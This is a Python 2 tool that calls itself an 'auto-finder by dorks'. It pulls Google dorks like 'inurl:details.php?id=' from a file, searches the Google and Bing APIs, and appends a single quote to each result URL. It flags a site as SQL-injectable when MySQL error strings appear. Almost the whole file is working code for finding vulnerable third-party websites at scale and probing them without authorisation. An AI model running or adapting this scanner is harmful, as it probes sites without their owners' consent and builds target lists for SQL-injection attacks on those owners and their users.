Search Bing and Google for Dorks

dorks.py

"""

***** Auto-finder by dorks tool with Google API & Bing API *****

@author: z0rtecx
@release date: dec-2014
@version: 1.0.12122014
@poc: good dork for find web pages whit SQLi vulnerability in ID parameter, e.g. "inurl:details.php?id="
@description: This tool is for save time for you. It is gathering dorks of a txt file, and search potential web pages with SQLi vulnerability. ONLY FOR MySQL errors.
@features: 
	- Find web pages vuln.
@usage:
	- You need a txt file in each line a dork with "inurl:" google command. E.g.
	
	inurl:event.php?id=
	inurl:product-item.php?id=
	inurl:news_view.php?id=
	...

	- You need Google Search API library: https://developers.google.com/api-client-library/python/apis/customsearch/v1
	- An Google API key: https://www.google.com/cse/manage/all
	- An Bing API key: Microsoft Azure Marketplace, search how get it in google :P

@example:
	
	$ python dorktool.py

"""


#!/usr/bin/env python

import urllib
import sys
import json
import re
import time
import MySQLdb
import urllib2
from urllib import quote_plus,unquote_plus
from apiclient.discovery import build

# CONSTANTS
############################################################
# Error messages to find in vulnerable web
	
ERROR_WORDS =  ["Warning", "You have an error in your SQL syntax"] 
DORK_OFFSET = 5				# Number of dorks in memory at same time
DORK_ROUND = 0					# Round of dork finding
LAST_DORK = 0					# Last dork byte in the file
PATRON = re.compile('=[0-9]+')  # Regular expresion to find in URLs

# Bing autentification
key = 'YOUR_BING_KEY'
credentials = (':%s' % key).encode('base64')[:-1]
auth = 'Basic %s' % credentials

# Google auth
GOOGLE_KEY = "YOUR_GOOGLE_KEY"
# Buscador de google
GOOGLE_CX = "YOUR_GOOGLE_CX"
############################################################

# Returns the http request from indicated url
def request(url):
	try:
  		req = urllib2.urlopen(urllib2.Request(url)).read()
	except:
		req = ''
  	return req

# Returns True if a url can be vulterable to SQLi. False in other case.
def isVulnerable(url):
	poc = url + '\''
	req = request(url)
	req2 = request(poc)
	if req == req2:
		return False
	else:
		for word in ERROR_WORDS:
			if word not in req and word in req2:
				return True
			else:
				continue
		return False

# Load DORK_OFFSET dorks in memory from 'dorks.txt' file
# Each time this function is called, news dorks are
# returned
def loadDorks(filename):
	global DORK_ROUND # To modify the global variable
	global LAST_DORK
	print 'Loading dorks... '+str(DORK_ROUND)
	DORKS = []
	f = open(filename)
	f.seek(LAST_DORK)
	for i in range(DORK_ROUND*DORK_OFFSET,DORK_ROUND*DORK_OFFSET+DORK_OFFSET):
		DORKS.append(f.readline())
		DORKS[-1]=DORKS[-1][:-1] # Remove dork's carrier return (\n)
	LAST_DORK = f.tell()
	f.close()
	DORK_ROUND+=1
	if DORK_ROUND == 201:
		print "Dorks finished."
		sys.exit()
	return DORKS

# Return a list of URLs, result of Google Dorks search
# Each element of the list is a diccionary which includes:
#	url
#	name of page
#	if vulnerable to SQLi
def googleSearch(dork):
	results = {}
	try:
		service = build("customsearch", "v1", developerKey=GOOGLE_KEY)
		rango = 1
		for i in range(1,6):
			try:
				res = service.cse().list(q=dork,cx=GOOGLE_CX,start=rango,filter='1').execute()
				for i in res[u'items']:
					dic = {
						'url' : i[u'link'],
						'nombre' : i[u'displayLink'],
						'vuln' : '',
						'buscador' : 'Google',
						'fecha_indexacion' : time.strftime("%Y-%m-%d"),
					}
					# If vulnerable
					if isVulnerable(dic['url']):
						dic['vuln'] = "[*]"
						results[dic['nombre']] = dic
					rango += 1
			except:
				return results
		print "Next Dork\n"
	except:
		return results
	return results

# Return a list of URLs find using Bing Dorks
def bingSearch(dork):
	results = {}
	url = 'https://api.datamarket.azure.com/Bing/Search/v1/Web?Query=%27' + quote_plus(dork) + '%27&$format=json'
	request = urllib2.Request(url)
	request.add_header('Authorization', auth)
	request_opener = urllib2.build_opener()
	response = request_opener.open(request)
	response_data = response.read()
	json_result = json.loads(response_data)
	lista = json_result['d']['results']
	for i in lista:
		url2 = 'http://'+str(i['DisplayUrl'].encode('ascii', 'ignore'))
		name = re.findall("((http\://|https\://|ftp\://)|(www.))+(([a-zA-Z0-9\.-]+\.[a-zA-Z]{2,4})|([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}))(/[a-zA-Z0-9%:/-_\?\.'~]*)?", url2)
		dic = {
			'url'  : url2, # Extract the url
			'nombre' : name[0][3], # Extract the name
			'vuln' : '',
			'buscador' : 'Bing', 
			'fecha_indexacion' : time.strftime("%Y-%m-%d"),
		}
		# If vulnerable
		if isVulnerable(url2):
			dic['vuln'] = '[*]'
			results[dic['nombre']] = dic
		else:
			continue
	return results

# Format the URLs for the screen output
def printResults(dork, results):
	i = 1
	for k, v in results.iteritems():
		print '\n------------------------------------'
		print '['+str(i)+'/'+str(len(results))+' from '+dork+']'
		print 'WEB NAME: %s' % v['nombre']
		print 'URL: %s' % v['url']
		print 'VULN: %s' % v['vuln']
		print 'SEARCH ENGINE: %s' % v['buscador']
		print 'DATE: %s' % v['fecha_indexacion']
		print '------------------------------------'
		i+=1
		sys.stdout.flush()


###############
# MAIN FUNCTION
###############

if __name__ == "__main__":
	while True:
		dorks = loadDorks('dorks.txt') # Load the first 30 dorks
		# For each dork, get all the urls of the search and try if vulnerable
		for d in dorks:
			google = googleSearch(d)
			bing = bingSearch(d)
			if len(google)!=0:
				printResults(d, google)
			else:
				print "No Google results found."
			if len(bing)!=0:
				printResults(d, bing)
			else:
				print "No Bing results found."